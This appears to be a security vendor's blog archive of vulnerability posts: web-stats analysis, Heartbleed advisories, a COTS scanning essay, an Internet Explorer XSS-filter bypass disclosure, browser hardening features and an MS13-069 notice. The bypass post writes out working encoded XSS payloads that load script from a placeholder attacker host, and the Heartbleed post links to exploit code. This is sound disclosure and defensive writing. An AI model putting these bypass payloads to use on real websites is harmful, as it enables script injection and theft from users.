Category Archives: Vulnerabilities

A Security Expert’s Thoughts on WhiteHat Security’s 2014 Web Stats Report

Editor’s note: Ari Elias-Bachrach is the sole proprietor of Defensium LLC. Ari is an application security expert. Having spent significant time breaking into web and mobile applications of all sorts as a penetration tester, he now works to improve application security. As a former developer with experience in both static and dynamic analysis, he works closely with developers to remediate vulnerabilities. He has also developed and taught secure development classes, and can help make security part of the SDLC. He is a regular conference speaker in the field of application security, and can be found on Twitter @angelofsecurity. Given his experience and expertise, we asked Ari to review our 2014 Website Security Statistics Report, which was announced yesterday, and to share his thoughts in this guest blog post.

The most interesting and telling chart, in my opinion, is the “Vulnerability class by language” chart. I started by asking myself a simple question: can vulnerabilities be dependent on the language used, and if so, which vulnerabilities? I computed the standard deviation of each vulnerability class across the different languages to see which classes had a high degree of variance. XSS (13.2) and information leakage (16.4) were the two highest. In other words, those are the two vulnerabilities most affected by the choice of programming language. In retrospect, info disclosure isn’t surprising at all, but XSS is a little interesting. The third is SQLi, with a standard deviation of 3.8; everything else is lower than that.
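As a rough illustration of that calculation, here is a minimal sketch (using made-up numbers, not the report’s actual data) that takes each vulnerability class’s rate per language and computes the standard deviation across languages:

from statistics import pstdev

# Hypothetical likelihood (%) of each vulnerability class, per language
rates = {
    "XSS":          {"ASP": 30, ".NET": 22, "Java": 28, "PHP": 50, "Perl": 45},
    "Info Leakage": {"ASP": 60, ".NET": 18, "Java": 55, "PHP": 40, "Perl": 25},
    "SQLi":         {"ASP": 9,  ".NET": 6,  "Java": 7,  "PHP": 12, "Perl": 11},
}

# A large standard deviation means the class is strongly affected by language choice
for vuln_class, by_language in rates.items():
    print(vuln_class, round(pstdev(by_language.values()), 1))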

Conclusion 1: The presence or absence of Cross-site scripting and information disclosure vulnerabilities is very dependent on the environment used, and SQLi is a little bit dependent on the environment. Everything else isn’t affected that much.

Now, while it seems that frameworks can do great things for security, if you live by the framework, you die by the framework. Looking at the “Days vulnerability open by language” chart, you can see some clear outliers where it looks like certain vulnerabilities simply cannot be fixed. If the developer can’t fix a problem in code and has to wait for an update to the framework, you end up with those few really high mean times to fix. This brings us to the negative consequence of relying on the framework to take care of security for us – it can limit our ability to make security fixes as well. In this case, the HTTP response splitting issue with ASP is a problem that cannot be fixed in the code, but requires waiting for the vendor to make a change, which the vendor may or may not judge necessary.

Conclusion 2: Live by the framework, die by the framework.

Also interesting is that XSS, which has the highest variance in occurrence, has the least variance in time to fix. I guess once it occurs, fixing an XSS issue takes about the same level of effort regardless of language. Honestly, I have no idea why this would be; I just find it very interesting.

Conclusion 3: Once it occurs, fixing an XSS issue is always about the same level of effort regardless of language. I can’t fathom the reason why, but my gut tells me it might be important.

I found the “Remediation rate by vulnerability class” chart to be perhaps the most surprising (at least to me). I would have assumed that remediation rates per vulnerability would correlate closely with the risk posed by each vulnerability, but that does not appear to be the case. Even more surprisingly, remediation rates do not seem to correlate with the ease of fixing the vulnerability, as measured by the previous chart on the number of days each vulnerability stayed open. Looking at SQLi, for example, the remediation rate is high in ASP, ColdFusion, .NET, and Java, and incredibly low in PHP and Perl. Yet PHP and Perl were the two languages where SQLi vulnerabilities were fixed the fastest! Why would they be getting fixed less often than in other environments? XSS likewise seems to be easiest to fix in PHP, yet that’s the least likely place for it to be fixed. Perhaps some of this can be explained by a single phenomenon – in some environments, it’s not worth fixing a vulnerability unless it can be done quickly and cheaply. If it’s a complex fix, it is simply not a priority. This would lead to low remediation rates and low days-to-patch at the same time. In my personal (and purely empirical, non-scientific) experience, Perl and PHP websites tend to be put up by smaller organizations with less mature processes, a lesser emphasis on security, and a greater focus on continuing to create new features. That may explain why many Perl and PHP vulnerabilities are either fixed fast or not at all. Without knowing more, my best guess is that many of the relationships here, while correlated, are not causal. In other words, some other force, like organizational culture, is driving both the choice of language and the remediation rate.

Conclusion 4: Remediation rates do vary across language, but the reasons seem to be unclear.

Final Conclusions
I started off with a very basic question: does the choice of programming language matter? The answer does seem to be yes. While we all know that in theory there is no vulnerability that can’t exist in a given environment, and no vulnerability that can’t be fixed in a given environment, the real world rarely works as neatly as it should “in theory.” Certain vulnerabilities are more likely in certain environments, and fixes may be easier or harder to apply, which affects the likelihood of their ever being applied. There has been a lot of talk lately about moving security into the framework, and this report provides evidence that the approach can be very successful. However, it also shows the risks of this approach if the framework does not implement the right security controls in the right way.

WhiteHat Security Observations and Advice about the Heartbleed OpenSSL Exploit

The Heartbleed SSL attack is one of the most significant, and most heavily publicized, vulnerabilities affecting the Internet in recent years. According to Netcraft, 17.5% of SSL-enabled sites on the Internet were vulnerable to the Heartbleed SSL attack just prior to its disclosure.

The vulnerable versions of OpenSSL were first released to the public 2 years ago. The implications of 2 years of exposure to this vulnerability are significant, and we will explore them further at the end of this article. First, the immediate details:

This attack does not require a MitM (Man in the Middle) position or any of the other complex setups that SSL exploits usually require. It can be executed directly and anonymously against any webserver/device running a vulnerable version of OpenSSL, and yield a wealth of sensitive information.

WhiteHat Security’s Threat Research Center (TRC) began testing customers for vulnerability to this attack immediately, using a custom SSL-testing tool from our TRC R&D labs. Our initial conclusion was that the frequency with which sites were vulnerable to this attack was low on production applications monitored by the WhiteHat Sentinel security service. In our first test sample, covering 18,000 applications, we found a vulnerability rate of about 2% – much lower than Netcraft’s 17.5% vulnerability rate for all SSL-enabled websites. This may be the result of a biased sample, since we only evaluated applications under Sentinel service, and application owners who use Sentinel may already be more security-conscious than most.

While the frequency of vulnerability to the Heartbleed SSL attack is low, those sites that are vulnerable are severely vulnerable. Everything in memory on the webserver/device running a vulnerable version of OpenSSL is exposed. This includes:

  • UserIDs
  • Passwords
  • PII (Personally Identifiable Information)
  • SSL certificate private keys (i.e., SSL traffic protected by this cert will never be private again if the key is compromised)
  • Any private crypto keys
  • SSL-based Chat
  • SSL-based VPN
  • SSL-based anything
  • Connection Strings (Database userIDs/Passwords) to back-end databases, mainframes, LDAP, partner systems, etc. loaded in memory
  • Additional vulnerabilities in source code that is loaded into memory, with their precise locations (e.g., Blind SQL injection)
  • Basically any code or data in memory on the server running a vulnerable version of OpenSSL is rendered in clear-text to all attackers

The most important thing you need to know regarding the above: this attack leaves no traces. No logs. Nothing suspect. It is a nice, friendly, read-only anonymous dump of memory. This is the digital equivalent of accidentally leaving a copy of your corporate diary, with all sorts of private secrets, on the seat of the mass-transit bus for everyone to read – including strangers you will never know. Your only recourse for secrets like passwords now is the delete key.

The list of vulnerable applications published to date includes mainstream web and mobile applications, security devices with web interfaces, and critical business applications handling sensitive and federally-regulated data.

This is a seriously sub-optimal situation.

Timeline of the Heartbleed SSL attack and WhiteHat Security’s response:

April 7th: Heartbleed 0day attack published. Websites vulnerable to the attack included major websites/email services that the majority of the Internet uses daily, and many mobile applications that use OpenSSL.

April 8th: WhiteHat TRC begins testing customers’ sites for vulnerability to Heartbleed SSL exploitation. In parallel, WhiteHat R&D begins QAing new automated tests to enable Sentinel services to identify this vulnerability at scale.

April 9th: WhiteHat TRC identifies roughly 350 websites vulnerable to the Heartbleed SSL attack out of an initial sample of 18,000 production applications. We find an initial average vulnerability rate of 1.9%, but this percentage drops rapidly over the next 48 hours.

April 10th: WhiteHat R&D releases new Sentinel Heartbleed SSL vulnerability tests, enabling Sentinel to automatically identify if any applications under Sentinel service are vulnerable to Heartbleed SSL attacks with every scan. This brings test coverage to over 35,000 applications. Average vulnerability rate drops to below 1% by EOD April 10th.

Analysis: the more applications we scan using the new Heartbleed SSL attack tests, the fewer sites (by percent) we find vulnerable to this attack. We suspect this is because most customers have moved quickly to patch this vulnerability, due to the extreme severity of the vulnerability and the intense media coverage of the issue.

Speculation: we suspect that this issue will quickly disappear for most important SSL-enabled applications on the Internet – especially applications under some type of active DAST or SAST scanning service. It will likely linger on with small sites hosted by providers that do not offer (or pay attention to) any form of security patching service.

We also expect this issue to persist with internal (non-Internet-facing) applications and devices that use SSL, but which are commonly not tested or monitored by tools or services capable of detecting this vulnerability, and that are less frequently upgraded.

While the attack surface of internal network applications & devices may appear to be much smaller than Internet-facing applications, simple one-click exploits are already available on the Internet, usable by anyone on your network with access to a web browser. (link to exploit code: http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html)

This means that any internal user on your network who downloads one of these exploits is capable of extracting everything in memory from any device or application on your internal network that is vulnerable. This includes:

  • Internal routers and switches
  • Firewalls and IDS systems
  • Human Resources applications
  • Finance and payroll applications
  • Pretty much any application or device running a vulnerable version of OpenSSL
  • Agents exploiting internal devices will see all network traffic or application data in memory on the affected device/application

Because most of these internal applications and devices lack the type of logging and alerting that would notify information security teams of active abuse of this vulnerability, our concern is that in the coming months these internal devices and applications may provide rich grounds for exploitation that may never be discovered.

Conclusion & Recommendations:
The scope, impact, and ease-of-exploitation of this vulnerability make it one of the worst in Internet history. However, patches are readily available for most systems, and the risk of the patch itself causing problems appears minimal. It appears most of our customers have already patched the majority of their Internet-facing systems against this exploit.

However, this vulnerability has existed for up to 2 years in OpenSSL implementations. We will likely never know whether anyone has been actively exploiting it, due to the difficulty of logging and tracking these attacks. If your organization is concerned about this, we recommend that, in addition to patching this vulnerability, SSL certificates of suspect systems be revoked and re-issued. We also recommend that all end-user passwords and system passwords be changed on suspect systems.

Is this vulnerability a “boy that cried wolf” hype situation? Bruce Schneier has another interesting perspective on this: https://www.schneier.com/blog/archives/2014/04/heartbleed.html.

WhiteHat will continue to share more information about this vulnerability as further information becomes available.

General reference material:
https://blog.whitehatsec.com/heartbleed-openssl-vulnerability/
https://www.schneier.com/blog/archives/2014/04/heartbleed.html/

Vulnerability details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160

Exploit details:
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html

Summaries:
http://business.kaspersky.com/the-heart-is-bleeding-out-a-new-critical-bug-found-in-openssl/
http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html

Heartbleed OpenSSL Vulnerability

Monday afternoon a flaw in the way OpenSSL handles the TLS heartbeat extension was revealed and nicknamed “The Heartbleed Bug.” According to the OpenSSL Security Advisory, “a missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.” The flaw creates an opening in SSL/TLS which an attacker could use to obtain private keys, usernames/passwords, and content.

OpenSSL versions 1.0.1 through 1.0.1f, as well as 1.0.2-beta1, are affected. The recommended fix is to upgrade to 1.0.1g and to reissue certificates for any sites that were using compromised OpenSSL versions.
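As a quick local sanity check, here is a minimal sketch (my own illustration, not a WhiteHat tool) that reports the OpenSSL version the local Python runtime is linked against and flags the known-vulnerable range. Note that this only inspects the local library; it does not test a remote server.

import ssl

# Versions affected per the advisory: 1.0.1 through 1.0.1f, plus 1.0.2-beta1
VULNERABLE = {"1.0.1", "1.0.1a", "1.0.1b", "1.0.1c", "1.0.1d", "1.0.1e", "1.0.1f", "1.0.2-beta1"}

version_string = ssl.OPENSSL_VERSION          # e.g. "OpenSSL 1.0.1f 6 Jan 2014"
version_number = version_string.split()[1]

print(version_string)
if version_number in VULNERABLE:
    print("Potentially vulnerable to Heartbleed: upgrade to 1.0.1g or later")
else:
    print("Not in the known-vulnerable version range")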

WhiteHat has added testing to identify websites currently running affected versions. These vulnerabilities will open as “Insufficient Transport Layer Protection” in the Sentinel interface. These tests are currently being run across all of our clients’ applications, and we expect full coverage of all applications under service within the next two days. WhiteHat also recommends that all assets, including non-web application servers and sites that are currently not under service with WhiteHat, be tested. Several tools have been made available to test for open issues: an online testing tool is available at http://filippo.io/Heartbleed/, another tool can be found on GitHub at https://github.com/titanous/heartbleeder, and a new script can be obtained from http://seclists.org/nmap-dev/2014/q2/36.

If you have any questions regarding the Heartbleed Bug, please email support@whitehatsec.com and a representative will be happy to assist. The OpenSSL Security Advisory is available at https://www.openssl.org/news/secadv_20140407.txt, and the Heartbeat extension itself is specified in https://tools.ietf.org/html/rfc6520.

Re: Mandated Third Party Static Analysis: Bad Public Policy, Bad Security

Mary Ann Davidson wasn’t shy about making her feelings known regarding scanning third-party software in a lively blog post entitled “Mandated Third Party Static Analysis: Bad Public Policy, Bad Security.” If you haven’t read it and you are in security, I do recommend giving it a read. Opinionated and outspoken, Mary Ann lays out her case against scanning third-party software. In this case, although I don’t totally agree with each individual point, I do agree with the overall conclusion.

Mary Ann delineates many individual reasons organizations should not scan third-party COTS (Commercial Off The Shelf) software. The reasons include non-standard practice, vendors already scan, little-to-no ROI, harm to the product’s overall security, increased risk to other clients, uneven access to security information, and risks to IP protection. I think the case can actually be greatly simplified. Scanning COTS software is simply a waste of time because that is not where most organizations are going to find and reduce risk.

Take web applications, which are at the top of every CISO’s usual list of suspects for risk. Should every organization on the web perform a complete security review of every single layer in that technology stack? Or how about mobile? Should an organization perform a complete review of iOS and Android before writing a mobile app or allowing employees to use mobile phones? I’m sure the consulting industry would love this, but it is simply not feasible for organizations of any size.

So what are we to do? In my opinion, a security team should strive to measure and mitigate the greatest amount of risk to an organization within its budgetary and time limitations, enabling the business to innovate with a reasonable amount of security assurance. For the vast majority of organizations, that formula is going to lead directly to their own custom-written or custom-outsourced software; specifically, their web applications.

Most organizations have a large number of web apps, a percentage of which will have horrific vulnerabilities that put the entire organization at risk. These vulnerabilities are well-known, very prevalent, and usually straightforward to remediate. A security program that provides continuous assessment of all the code written and/or commissioned by your organization, both during development and in deployment, should be the front line of security for nearly every organization with a presence on the web, as it normally finds a trove of preventable risk that would otherwise be exploitable by attackers on the web.

So what is the problem with scanning both our custom code and third-party COTS software? It is a misallocation of resources. Unless you have unlimited budget and time, you are much better off focusing on evaluating your custom-written source code for vulnerabilities, which can be ranked by criticality and mitigated by your development team.

Again, that is not to say there are no risks in using COTS software. Of course there are. All software has vulnerabilities. Risks are present in every level of a technology stack. For example, a web app may depend on a BIOS/UEFI, an OS, a web server, a database server, an application server, multiple server-side frameworks, multiple client-side frameworks, and many other auxiliary programs.

But the likelihood of your organization performing yet another evaluation of software that has most likely already gone through a security regimen is exponentially less effective in managing risk than focusing more of your security resources on building a more robust security program around your own in-house custom software.

Well, what should we do to mitigate third-party risk? The most overlooked and basic security precaution is to keep a full manifest of all third-party COTS and open-source code running in your environment. Few, if any, organizations have a full listing of all the third-party apps and libraries they use. Keeping an account of this information, and then frequently checking for security updates and patches for that third-party code, is obvious and elementary, yet almost universally overlooked.
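As a sketch of what that accounting can look like in practice (the file names and format here are hypothetical), the idea is simply to diff the component versions you actually run against the versions you last confirmed as patched:

import json

def outdated_components(manifest_path, patched_path):
    # Return components whose deployed version differs from the latest patched version
    deployed = json.load(open(manifest_path))   # e.g. {"openssl": "1.0.1f", "struts": "2.3.15"}
    patched = json.load(open(patched_path))     # e.g. {"openssl": "1.0.1g", "struts": "2.3.15.1"}
    return {name: (version, patched[name])
            for name, version in deployed.items()
            if name in patched and version != patched[name]}

for name, (have, want) in outdated_components("manifest.json", "patched.json").items():
    print(f"{name}: running {have}, latest patched release is {want}")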

This basic security formula would have prevented most of the successful web attacks that make daily headlines: continuously scan your custom applications, check third-party libraries for security updates, use that information to evaluate the biggest risks to your organization, and work to mitigate the most severe of them.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user against the response body from the website, looking for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page but not cause immediate JavaScript code execution, the untrusted data from that injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while decimal encodings go back further, to the first official HTML standard, HTML 2.0, in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character reference in the response body of an HTTP request, it automatically decodes it and displays the referenced character to the user.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.
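To make that concrete, here is a small sketch (my own illustration, not code from the original research) that replaces a few characters of the classic payload with decimal character references and then confirms that a standard HTML decode, which is effectively what the browser performs, restores the original payload:

import html

payload = "<script src=http://attacker/evil.js></script>"

# Replace selected characters with their decimal character references,
# so the literal token "script" never appears in the reflected attribute.
def encode_chars(text, chars="crp"):
    return "".join("&#%d;" % ord(ch) if ch in chars else ch for ch in text)

encoded = encode_chars(payload)
print(encoded)                            # no "script" token for the filter to match
print(html.unescape(encoded) == payload)  # True: decoding restores the executable payload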

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword:

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, decimal and hexadecimal encodings are not themselves the flaw; they are merely two implementations of the method that exploits it. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw in Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data, and trusted data is not subject to validation by the filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

What’s the Difference between Aviator and Chromium / Google Chrome?

Context:

It’s a fundamental rule of Web security: a Web browser must be able to defend itself against a hostile website. Presently, in our opinion, the market-share-leading browsers cannot do this adequately. This is an everyday threat to personal security and privacy for the more than one billion people online, which includes us. We’ve long held and shared this point of view at WhiteHat Security. Like any sufficiently large company, we have many internal staff members who aren’t as tech-savvy as WhiteHat’s Threat Research Center, so we had the same kind of security problem that the rest of the industry had: we had to rely on educating our users, because no browser on the market was suitable for our security needs. But education is a flawed approach – there are always new users and new security guidelines. So instead of engaging in a lengthy educational campaign, we began designing an internal browser that would be secure and privacy-protecting enough for our own users — by default. Over the years a great many people — friends, family members, and colleagues alike — have asked us what browser we recommend, or even what browser their children should use. Aviator became our answer.

Why Aviator:

The attacks a website can generate against a visiting browser are diverse and complex, but can be broadly categorized into two types. The first type of attack is designed to escape the confines of the browser walls and infect the desktop with malware. Today’s top-tier browser defenses include software security in the browser core, an accompanying sandbox, URL blacklists, silent updates, and plug-in click-to-play. The well-known browser vendors have done a great job in this regard and should be commended. No one wins when users’ desktops become part of a botnet.

Unfortunately, the second type of browser attack has been left largely undefended. These attacks are pernicious and carry out their exploits within the browser walls. They typically don’t implant malware, but they are indeed hazardous to online security and privacy. I’ve previously written up a lengthy 8-part blog post series on the subject documenting the problems. For a variety of reasons, these issues have not been addressed by the leading browser vendors. Rather than continue asking for updates that would likely never come, we decided we could do it ourselves.

To create Aviator we leveraged open source Chromium, the same browser core used by Google Chrome. Then, because the BSD license of Chromium allows us, we made many very particular changes to the code and configuration to enhance security and privacy. We named our product Aviator. Many people are eager to learn what exactly the differences are, so let’s go over them.

Differences:

  1. Protected Mode (Incognito Mode) / Not Protected Mode:
    TL;DR All Web history, cache, cookies, auto-complete, and local storage data is deleted after restart.
    Most people are unaware that there are 12 or more locations in a browser where websites may store cookie and cookie-like data. Cookies are typically used to track your surfing habits from one website to the next, but they also expose your online activity to nosy people with access to your computer. Protected Mode purges these storage areas automatically with each browser restart. While other browsers have this feature or something similar, it is not enabled by default, which can make it a chore to use. Aviator launches directly into Protected Mode by default and clearly indicates the mode of the current window. The security / privacy side effect of Protected Mode also helps protect against browser auto-complete hacking, login detection, and deanonymization via clickjacking by reducing the number of session states you have open, thanks to an intentional lack of persistence in the browser across different sessions.
  2. Connection Control: 
    TL;DR Rules for controlling the connections made by Aviator. By default, Aviator blocks Intranet IP-addresses (RFC1918).
    When you visit a website, it can instruct your browser to make potentially dangerous connections to internal IP addresses on your network — IP addresses that could not otherwise be reached from the outside (NAT). Exploitation may lead to simple reconnaissance of internal networks, or it may permanently compromise your network, for example by overwriting the firmware on your router. Without installing special third-party software, it’s impossible to block any bit of Web code from carrying out browser-based intranet hacking (see the sketch after this list). If Aviator happens to be blocking something you want to be able to get to, Connection Control allows the user to create custom rules — or temporarily use another browser.
  3. Disconnect bundled (Disconnect.me): 
    TL;DR Blocks ads and 3rd-party trackers.

    Essentially every ad on every website your browser encounters is tracking you, storing bits of information about where you go and what you do. These ads, along with invisible 3rd-party trackers, also often carry malware designed to exploit your browser when you load a page, or to try to trick you into installing something should you choose to click on it. Since ads can be authored by anyone, including attackers, both ads and trackers may also harness your browser to hack other systems, hack your intranet, incriminate you, etc. Then of course the visuals in the ads themselves are often distasteful, offensive, and inappropriate, especially for children. To help protect against tracking, login detection and deanonymization, auto cross-site scripting, drive-by-downloads, and evil cross-site request forgery delivered through malicious ads, we bundled in the Disconnect extension, which is specifically designed to block ads and trackers. According to the Chrome web store, over 400,000 people are already using Disconnect to protect their privacy. Whether you use Aviator or not, we recommend that you use Disconnect too (Chrome / Firefox supported). We understand many publishers depend on advertising to fund the content. They also must understand that many who use ad blocking software aren’t necessarily anti-advertising, but more pro security and privacy. Ads are dangerous. Publishers should simply ask visitors to enable ads on the website to support the content they want to see, which Disconnect’s icon makes it easy to do with a couple of mouse-clicks. This puts the power and the choice into the hands of the user, which is where we believe it should be.
  4. Block 3rd-party Cookies: 
    TL;DR Default configuration update. 

    While it’s very nice that cookies, including 3rd-party cookies, are deleted when the browser is closed, it’s even better when 3rd-party cookies are not allowed in the first place. Blocking 3rd-party cookies helps protect against tracking, login detection, and deanonymization during the current browser session.
  5. DuckDuckGo replaces Google search: 
    TL;DR Privacy enhanced replacement for the default search engine. 

    It is well known that Google search makes the company billions of dollars annually via user advertising and user tracking / profiling. DuckDuckGo promises exactly the opposite: “Search anonymously. Find instantly.” We felt that was a much better default option. Of course, if you prefer another search engine (including Google), you are free to change the setting.
  6. Limit Referer Leaks: 
    TL;DR Referers no longer leak cross-domain, but are only sent same-domain by default. 

    When clicking from one link to the next, browsers tell the destination website where the click came from via the Referer header (intentionally misspelled). Doing so can leak sensitive information contained in the referring URL, such as the search keywords used, internal IPs/hostnames, session tokens, etc., while offering little, if any, benefit to the user. Aviator therefore only sends these headers within the same domain.
  7. Plug-Ins Click-to-Play: 
    TL;DR Default configuration update enabled by default. 

    Plug-ins (e.g., Flash and Java) are a source of tracking, malware exploitation, and general annoyance. Plug-ins often keep their own storage for cookie-like data, which isn’t easy to delete, especially from within the browser. Plug-ins are also a huge attack vector for malware infection: your browser might be secure, but the plug-ins are not, and they must be updated constantly. Then of course there are all the annoying sounds and visuals made by plug-ins, which are difficult to identify and block once they load. So, we blocked them all by default. When you want to run a plug-in, say on YouTube, just click once on the puzzle piece. If you want a website to always load its plug-ins, that’s a configuration change as well: “Always allow plug-ins on…”
  8. Limit data leakage to Google: 
    TL;DR Default configuration update.

    In Aviator we’ve disabled “Use a web service to help resolve navigation errors” and “Use a prediction service to help complete searches and URLs typed in the address bar” by default. We also removed all options to sync / log in to Google, and the tracking traffic sent to Google upon Chromium installation. For many of the same reasons that we default to DuckDuckGo as the search engine, we have limited what the browser sends to Google in order to protect your privacy. If you choose to use Google services, that is your choice. If you choose not to, though, opting out can be difficult in some browsers. Again, our mantra is choice – and this gives you the choice.
  9. Do Not Track: 
    TL;DR Default configuration update.

    Enabled by default. While we prefer “Can-Not-Track” to “Do-Not-Track,” we figured it was safe enough to enable the “Do Not Track” signal by default in the event it gains traction.
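
Here is the sketch referenced in the Connection Control item above: a minimal illustration (my own, not Aviator’s actual code) of the kind of check that blocking RFC1918 targets implies, refusing any request whose destination resolves to a private or loopback address.

import ipaddress
import socket

def is_intranet_target(host):
    # True if the host resolves to an RFC1918 (private) or loopback address
    try:
        addr = ipaddress.ip_address(socket.gethostbyname(host))
    except (socket.gaierror, ValueError):
        return False
    return addr.is_private or addr.is_loopback

print(is_intranet_target("192.168.1.1"))   # True: blocked by default
print(is_intranet_target("example.com"))   # False: allowed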

We so far have appreciated the response to WhiteHat Aviator and welcome additional questions and feedback. Our goal is to continue to make this a better and more secure browser option for consumers. Please continue to spread the word and share your thoughts with us. Please download it and give it a test run. Let us know what you think! Click here to learn more about the Aviator browser.

Browser Wars to Browser Foes – MS13-069

Microsoft has just published a high-severity 0-day vulnerability affecting all versions of Internet Explorer 6.0 and greater, on all operating systems higher than Windows XP Service Pack 3. This vulnerability uses a corrupted memory object to remotely execute code on the victim’s machine with the current user’s privileges. More information about how the vulnerability is exploited can be found at Microsoft here.

All that is required is for the victim to click a malicious link hosted by the attacker; this in turn runs the attacker’s code and gives the attacker access to the machine.

This attack can be delivered through social media sites, chat messages, email, and malicious websites. As a precaution, it may be wise to change the default browser to something other than Internet Explorer until the affected machine is patched. Microsoft’s instructions for changing the default browser are available here for Windows 7 and Windows XP.

